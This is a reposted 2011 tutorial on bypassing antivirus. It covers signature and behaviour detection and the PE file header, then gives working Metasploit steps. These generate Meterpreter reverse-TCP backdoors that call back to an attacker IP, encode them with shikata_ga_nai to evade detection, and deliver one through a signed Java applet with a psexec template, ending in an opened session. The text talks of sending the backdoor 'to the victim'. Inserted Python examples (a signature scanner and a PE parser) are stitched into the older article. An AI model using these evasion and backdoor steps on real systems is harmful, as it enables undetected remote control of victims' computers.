posted by 블르샤이닝 2011. 12. 15. 14:28

Source: http://resources.infosecinstitute.com/how-to-bypass-antivirus/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+infosecResources+(InfoSec+Resources)&utm_content=Google+Reader

How do you bypass an antivirus? This is not a new question; everyone who belongs to ethical hacking and penetration testing groups discusses this issue often. Even new users (script kiddies) are anxious to learn ways to get their keyloggers, stealers and RATs (remote administration tools) past it. Clearly, there is a pressing and widespread need to bypass anti-virus, even in the course of penetration testing and ethical hacking, where the aim is to build a robust defense for an operating system. Let's consider a simple example: suppose a company hired you to conduct a vulnerability assessment on their network. They give you a black-box test, so you aren't equipped with much information about the network. If they are using an end-to-end anti-virus solution for their network, whenever you launch a test, the anti-virus system in place will defend against it. So the first obstacle you'll need to overcome is bypassing the anti-virus. It is very easy to discuss a tool that can hide any file from the eye of anti-virus systems, but it is probably more effective to understand the story behind the tools or techniques in order to best implement them. In this article we will cover:

  • How Anti-virus works
  • What are the ways (techniques) to bypass an Anti-virus
  • Metasploit tutorial to bypass an anti-virus

How Anti-virus Works

It is very important to discuss the working mechanism of anti-viruses, because if you don't know how an anti-virus works or how it detects viruses, you will limit your ability to effectively cheat or bypass one. Many companies build their anti-virus in their own way, but they all share two main approaches to detecting a virus:

  • Signature based detection
  • Suspicious Behavior

Signature-based detection is the most common and widely used technique. In it, an anti-virus system compares the content of the file to its signature database. Signature-based detection, while a fast and effective technique, is limited in that it can only detect known viruses. The other technique is based on monitoring suspicious activities and behavior. With this technique, an anti-virus continuously observes (in real time) the behavior of a file. If a file overwrites itself and steals data without user permission, then this file is treated as a virus.
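To make the signature-based approach concrete, here is an added example (my own code, not from the original article or from any anti-virus vendor) of a minimal byte-signature scanner. Signatures are written as hex strings in the style of ClamAV's hex signatures, where "??" stands for any one byte; the signature entries, the three sample files and their byte contents are all constructed for this illustration and do not correspond to any real malware. It shows both what the paragraph states (an exact pattern only finds the known file) and the usual engineering answer to that limit (wildcards in the pattern so a close variant is still caught).

```python
import re

def compile_signature(hex_pattern):
    """Compile a hex signature such as '68 65 ?? 6C' into a bytes regex.
    Each pair of hex digits is one literal byte; '??' matches any byte."""
    tokens = hex_pattern.replace(" ", "")
    if len(tokens) % 2:
        raise ValueError("hex signature must have an even number of nibbles")
    parts = []
    for i in range(0, len(tokens), 2):
        pair = tokens[i:i + 2]
        parts.append(b"." if pair == "??" else re.escape(bytes.fromhex(pair)))
    # DOTALL so '.' also matches 0x0A, which is just another byte in a binary.
    return re.compile(b"".join(parts), re.DOTALL)

# Constructed signature database (name -> hex pattern). The byte sequences are
# made up for this example; they are the ASCII of "hello-bad" and a wildcard
# variant of it, not patterns taken from any real anti-virus product.
SIGNATURES = {
    "Example.Exact":    "68 65 6C 6C 6F 2D 62 61 64",   # "hello-bad", fixed bytes
    "Example.Wildcard": "68 65 6C 6C 6F ?? 62 61 64",   # tolerates one varying byte
}
COMPILED = {name: compile_signature(pattern) for name, pattern in SIGNATURES.items()}

def scan(data):
    """Return the sorted names of every signature found anywhere in data."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(data))

def scan_all(samples):
    """Scan a mapping of filename -> bytes and report hits per file."""
    return {filename: scan(content) for filename, content in samples.items()}

# Constructed sample "files": a known bad file, a one-byte variant of it, and a
# clean file. The leading bytes only imitate a DOS header for realism.
SAMPLES = {
    "known.bin":   b"MZ\x90\x00" + b"hello-bad" + b"\x00" * 4,
    "variant.bin": b"MZ\x90\x00" + b"hello_bad" + b"\x00" * 4,
    "clean.bin":   b"MZ\x90\x00" + b"hello world",
}

if __name__ == "__main__":
    for filename, hits in scan_all(SAMPLES).items():
        print("%-12s %s" % (filename, ", ".join(hits) if hits else "clean"))
```

The exact signature finds only known.bin; variant.bin, which differs by a single byte, is missed by it and caught only by the wildcard entry, and clean.bin matches nothing. That one-byte gap is exactly why a detection engineer writes signatures over the stable parts of a family rather than over a whole file, and why signature matching is paired with the behavioral monitoring described above.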

Example:

Here’s an example to best understand the working mechanism of an anti-virus: let’s say you have installed an anti-virus on your computer. When you plug-in your flash drive (USB), there are two options:

  • Anti-virus will automatically detect viruses (based on suspicious activities)
  • You will launch a scan against your USB and then the anti-virus finds some virus (Signature based detection)

This is how an anti-virus works; now we need to discuss the file format. PE, or Portable Executable, is the default file format for Windows binaries. Most viruses and malware hide in PE files. So what is the structure of a Portable Executable file, and how does an anti-virus read the signature?

    +-------------------+
    | DOS-stub          |
    +-------------------+
    | PE file-header    |
    +-------------------+
    | optional header   |
    |- - - - - - - - - -|
    |                   |
    | data directories  |
    |                   |
    +-------------------+
    |                   |
    |   Image pages     |
    |                   |
    +-------------------+
    |                   |
    | section tables    |
    |                   |
    +-------------------+
    |                   |
    | section 1         |
    |                   |
    +-------------------+
    |                   |
    | ...               |
    |                   |
    +-------------------+
    |                   |
    | section n         |
    |                   |
    +-------------------+

 

This is the typical structure of the Portable Executable file. Each section can be divided into multiple sub-sections, but in this article we'll discuss it only as far as the anti-virus detection methodology needs. The PE (Portable Executable) file header is the most important section, containing:


  • Signature bytes
  • Time and date stamp
  • Image base and image size
  • Stack reserve size
  • Debug table
  • Fixup table
  • Security table
  • and more

So the PE file header is the one that contains the signature and other important values of any executable file. In the signature area, the first value usually identifies the microprocessor type. The typical microprocessor types are 16-bit, 32-bit and 64-bit. For example, the 80386 processor has a value of 0x14c.
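The diagram and the list above become clearer when the header is actually parsed. Here is an added example (my own code, not from the original article or from InfoSec Institute) that builds a constructed minimal PE image in memory and reads the fields named above from it: the "PE\0\0" signature bytes, the machine type that follows them (0x14c for the 80386), the time/date stamp, image base, image size, stack reserve size and the section table. Field offsets follow the Microsoft PE/COFF specification; the sample image, its timestamp and section names are constructed for this example and it is not a runnable executable. The parser also handles the 64-bit (PE32+) optional header, which the article does not show.

```python
import struct

# Machine values from the PE/COFF specification (IMAGE_FILE_MACHINE_*).
MACHINE_TYPES = {
    0x014C: "i386 (80386 and later, 32-bit)",
    0x8664: "x86-64 (AMD64, 64-bit)",
    0x01C0: "ARM",
    0xAA64: "ARM64",
}

def build_sample_pe(machine=0x014C, section_names=(".text", ".data")):
    """Constructed sample: DOS header, PE signature, COFF file header, PE32
    optional header and a section table. It exists only to exercise the parser."""
    e_lfanew = 0x80
    dos_stub = bytearray(e_lfanew)                      # DOS header + empty stub
    dos_stub[0:2] = b"MZ"
    struct.pack_into("<I", dos_stub, 0x3C, e_lfanew)    # e_lfanew -> PE header

    optional = bytearray(224)                           # PE32 optional header
    struct.pack_into("<H", optional, 0, 0x10B)          # Magic: PE32
    struct.pack_into("<I", optional, 28, 0x00400000)    # ImageBase
    struct.pack_into("<I", optional, 56, 0x3000)        # SizeOfImage
    struct.pack_into("<I", optional, 72, 0x100000)      # SizeOfStackReserve
    struct.pack_into("<I", optional, 92, 16)            # NumberOfRvaAndSizes

    # COFF file header: Machine, NumberOfSections, TimeDateStamp (constructed),
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    # (0x0102 = EXECUTABLE_IMAGE | 32BIT_MACHINE).
    coff = struct.pack("<HHIIIHH", machine, len(section_names), 0x4EE7D1E0,
                       0, 0, len(optional), 0x0102)

    sections = b""
    for i, name in enumerate(section_names):
        sections += struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                                0x1000, 0x1000 * (i + 1),      # VirtualSize, VirtualAddress
                                0x200, 0x400 + 0x200 * i,      # SizeOfRawData, PointerToRawData
                                0, 0, 0, 0, 0x60000020)        # relocs/lines, Characteristics
    return bytes(dos_stub) + b"PE\0\0" + coff + bytes(optional) + sections

def parse_pe_header(data):
    """Parse the DOS header, PE signature, COFF file header, the optional-header
    fields the article lists, and the section table of a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a DOS/MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")

    coff_off = e_lfanew + 4        # the machine type is the first COFF field
    (machine, nsect, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff_off)

    opt_off = coff_off + 20
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == 0x10B:             # PE32: 32-bit ImageBase and stack sizes
        image_base = struct.unpack_from("<I", data, opt_off + 28)[0]
        stack_reserve = struct.unpack_from("<I", data, opt_off + 72)[0]
    elif magic == 0x20B:           # PE32+: 64-bit ImageBase and stack sizes
        image_base = struct.unpack_from("<Q", data, opt_off + 24)[0]
        stack_reserve = struct.unpack_from("<Q", data, opt_off + 72)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    size_of_image = struct.unpack_from("<I", data, opt_off + 56)[0]

    sections = []
    sect_off = opt_off + opt_size  # section table follows the optional header
    for i in range(nsect):
        (name, _vsize, vaddr, raw_size, raw_ptr, _rel, _lin, _nrel, _nlin,
         flags) = struct.unpack_from("<8sIIIIIIHHI", data, sect_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "raw_offset": raw_ptr,
                         "raw_size": raw_size, "characteristics": flags})

    return {"e_lfanew": e_lfanew, "machine_offset": coff_off, "machine": machine,
            "machine_name": MACHINE_TYPES.get(machine, "unknown (0x%04x)" % machine),
            "number_of_sections": nsect, "timestamp": timestamp,
            "characteristics": characteristics, "image_base": image_base,
            "size_of_image": size_of_image, "stack_reserve": stack_reserve,
            "sections": sections}

if __name__ == "__main__":
    info = parse_pe_header(build_sample_pe())
    print("machine 0x%04x (%s) at file offset 0x%x" %
          (info["machine"], info["machine_name"], info["machine_offset"]))
    for s in info["sections"]:
        print("  %-8s rva=0x%05x raw=0x%04x size=0x%x" %
              (s["name"], s["virtual_address"], s["raw_offset"], s["raw_size"]))
```

Run against a real file by replacing build_sample_pe() with open(path, "rb").read(); the machine_offset it reports is the kind of offset the netcat example below refers to. Note that these header fields identify the file format, not malware: an anti-virus signature is a pattern over the file's contents, and the header only tells the scanner where the sections and their bytes are.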

Let's take the example of a typical netcat backdoor listener, which binds cmd to port number 99 so that a client can connect to it. By doing a little analysis, we can see that the signature is located at offset E77E.

Now just imagine the importance of the signature in any Portable Executable file. There are different tools available to find it. If you want to bypass an anti-virus, then you'll need to modify this signature so that the anti-virus treats the file as a normal one.

Below is the list of some utilities that are based on netcat and have the ability to bypass anti-viruses.

  • Cryptcat Project: This is an advanced utility based on netcat that adds encryption, with ports for Windows, BSD and Linux.
  • MOCAT backdoor: This one is based on the cryptcat project and works in a client/server model, meaning it has two executables: one for Windows and the other for Linux. All communications of MOCAT are encrypted.
  • Ncat: Ncat is a wonderful tool that has been designed by the nmap community. It works on both TCP and UDP ports and on IPv4 as well as IPv6.

Bypass an Anti-virus – Metasploit Tutorial

 

The first part of our discussion focused on the importance of encoding to bypass an anti-virus. Metasploit is a wonderful tool with many encoders to bypass anti-viruses. Some of the encoders are based on polymorphic code (as in a polymorphic virus). Polymorphic code changes the signature every time it infects a new file. Shikata_ga_nai seems to be the best encoder for encoding a virus so that your file easily bypasses most anti-viruses. According to a wonderful blog post published on secmaniac, the best combination to bypass almost 85% of anti-viruses is:

  • Shikata encoding 5 times
  • Alpha_Upper encoding 2 times
  • Shikata encoding 5 times
  • Countdown encoding 5 times

 

Within the social engineering toolkit encoder list, shikata_ga_nai is a particularly good encoder. Take a look at the picture below:

You can find a list of available encoders in Metasploit. Please follow the commands below:

 root@bt:~# msfencode -h 

    Usage: /opt/framework/msf3/msfencode

OPTIONS: 

    -a   The architecture to encode as
    -b   The list of characters to avoid: '\x00\xff'
    -c   The number of times to encode the data
    -d   Specify the directory in which to look for EXE templates
    -e   The encoder to use
    -h        Help banner
    -i   Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m   Specifies an additional module search path
    -n        Dump encoder information
    -o   The output file
    -p   The platform to encode for
    -s   The maximum size of the encoded data
    -t   The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -v        Increase verbosity
    -x   Specify an alternate executable template 

---------------------------------------------------------------------------------------------------------------------------
root@bt:~# msfencode -l 

Framework Encoders
================== 

    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder

 

Example without Encoder

The first demonstration is done without using any encoder. In the second, I will use the best encoder, after which we'll compare the results of both. Here is the simple backdoor generation step:

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > Desktop/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
root@bt:~#

 

You can see that the most common and famous anti-viruses have detected malware in the file. It is therefore not good practice to send this file to the victim, since an anti-virus can easily detect it.

Example with Encoder

In this example I will use an encoder so that the backdoor will easily be able to bypass anti-viruses. Here’s how to begin:

 root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X | msfencode -c 1 -e x86/shikata_ga_nai > Desktop/meterpreter_1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1) 

root@bt:~#

 


Now you can easily see the difference between these two results.

Bypass An Anti-virus during Exploitation

Now consider the other side of the picture: automated exploits run into problems when the operating system is vulnerable and you could take control of it, but an enabled anti-virus intercepts the payload. Here's another example:

msf > use exploit/multi/browser/java_signed_applet
msf  exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(java_signed_applet) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.1.12:4444
[*] Using URL: http://0.0.0.0:8080/bOX4eN
[*]  Local IP: http://192.168.1.12:8080/bOX4eN
[*] Server started.
msf  exploit(java_signed_applet) > [*] Handling request from 192.168.1.12:39663...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed.  Building jar file...
[*] Jar built.  Signing...
[*] Jar signed.  Ready to send.

The victim's computer runs Windows with AVG anti-virus enabled, and no session has been opened. Though the victim is vulnerable, the attack fails because of the anti-virus. Now I will change the scenario slightly: Metasploit uses a default template.exe for executable generation, and to bypass an anti-virus we need to use a custom Windows executable.

What about telnet? What other ports are available for remote desktop connection? PsTools is a useful toolkit of command-line tools for administrative purposes. PsExec is among these tools; it is a utility that allows you to execute programs on remote systems:

msf exploit(java_signed_applet) > set Template /tmp/pstools/psexec.exe
Template => /tmp/pstools/psexec.exe
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.1.12:4444
[*] Using URL: http://0.0.0.0:8080/bOX4eN
[*]  Local IP: http://192.168.1.12:8080/bOX4eN
[*] Server started. 

msf  exploit(java_signed_applet) > [*] Handling request from 192.168.1.12:39663...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed.  Building jar file...
[*] Jar built.  Signing...
[*] Jar signed.  Ready to send.
[*] Sending stage (748032 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.8:5807) 

msf exploit(java_signed_applet) > sessions -i 1
[*] Starting interaction with 1...

 

This example shows that encoding is not the only way to bypass anti-viruses: you can also easily fool an anti-virus by using legitimate files.

Conclusion

 

There are some wonderful tutorials and techniques available to bypass anti-virus. Among them are some crypters, wrappers and other tools readily found on the internet for the public, but downloading these files from unknown sources is not recommended. Some people use these techniques to take advantage of the innocent, so when you download and install such a file, keep in mind that there is a chance that your computer will be at risk of some sort of malware or backdoor attack.

 

Last but not least, never trust any unknown source. Otherwise, you can become the next victim, whether you have an anti-virus or not, now that you have seen how easy it is to bypass them.


